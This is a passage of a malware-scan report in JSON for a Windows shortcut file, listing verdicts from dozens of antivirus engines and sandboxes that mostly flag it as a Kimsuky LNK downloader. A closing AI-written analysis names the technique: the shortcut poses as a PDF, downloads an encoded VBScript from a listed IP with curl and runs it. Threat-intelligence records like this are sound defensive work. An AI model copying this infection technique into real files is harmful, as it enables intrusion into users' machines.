"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.54.59615",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.54.59617",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1214",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260525",
"category": "malicious",
"result": "Scr.Mallnk!gen3"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK/Kimsuky.AD trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260515",
"category": "malicious",
"result": "Other:Malware-gen [Trj]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260526",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR:Trojan.Multi.GenBadur.genw"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.GenericKD.79850702"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK.S.Downloader.20398"
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Kimsuky/LNK!8.17BBA (KTSE)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Troj/DownLnk-AW"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.TR/Malware"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK.Downloader.1067"
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260525",
"category": "malicious",
"result": "Trojan.GenericKD.79850702"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14532",
"engine_update": "20260526",
"category": "malicious",
"result": "ti!169586B6EB36"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260526",
"category": "malicious",
"result": "lnk.trojan.genbadur"
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.GenericKD.79850702 (B)"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44681AVA:64.31308",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.GenericKD.79850702"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1779789766",
"engine_update": "20260526",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260526",
"category": "malicious",
"result": "TR/Malware"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan/Multi.GenBadur"
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260524",
"category": "malicious",
"result": "Win32.Troj.Unknown.a"
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.246.174",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38677",
"engine_update": "20260526",
"category": "malicious",
"result": "Malware@#3t9lln4pktog6"
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Generic.D4C26CCE"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107039",
"engine_update": "20260526",
"category": "malicious",
"result": "Troj/DownLnk-AW"
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan:Win32/WinLNK!AMTB"
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK/ABTrojan.VPCN-"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260526",
"category": "malicious",
"result": "Downloader/LNK.Generic"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-05-26.02",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Probably Heur.LNKScript"
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260526",
"category": "malicious",
"result": "Win32.Trojan.Genbadur.Mjgl"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260525",
"category": "malicious",
"result": "LNK/Downloader.hbu"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "b8a15cc:b8a15cc:e0fccfc:e0fccfc",
"engine_update": "20260525",
"category": "malicious",
"result": "Trojan/Generic!021C276024A3BE99"
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260515",
"category": "malicious",
"result": "Other:Malware-gen [Trj]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan[downloader]:Win/Agent.gyf"
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260526-00",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.261",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.782",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260504",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
}
},
"times_submitted": 5,
"reputation": -57,
"type_extension": "lnk",
"sandbox_verdicts": {
"C2AE": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "C2AE",
"malware_names": [
"LnkMalicious"
],
"confidence": 80
},
"Yomi Hunter": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Yomi Hunter"
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"type_description": "Windows shortcut",
"last_analysis_stats": {
"malicious": 38,
"suspicious": 0,
"undetected": 24,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 0,
"type-unsupported": 13
},
"total_votes": {
"harmless": 0,
"malicious": 6
},
"first_seen_itw_date": 1775464720,
"sigma_analysis_summary": {
"Joe Security Rule Set (GitHub)": {
"critical": 1,
"high": 0,
"medium": 0,
"low": 0
},
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 9,
"medium": 7,
"low": 2
}
},
"crowdsourced_ai_results": [
{
"analysis": "This LNK file is malicious, designed to deceive users by masquerading as a PDF file while executing a multi-stage infection chain. It leverages cmd.exe to resize the console window for stealth, downloads a VBScript Encoded file (ant.vbe) from a remote IP address (103.67.196.25) using the curl utility, saves it to a public directory, and immediately executes the script. This behavior involves LOLBins, remote script delivery, and deceptive icon usage.",
"source": "palm",
"verdict": "malicious",
"category": "code_insight",
"id": "169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f-file-palm"
}
]
}
}
}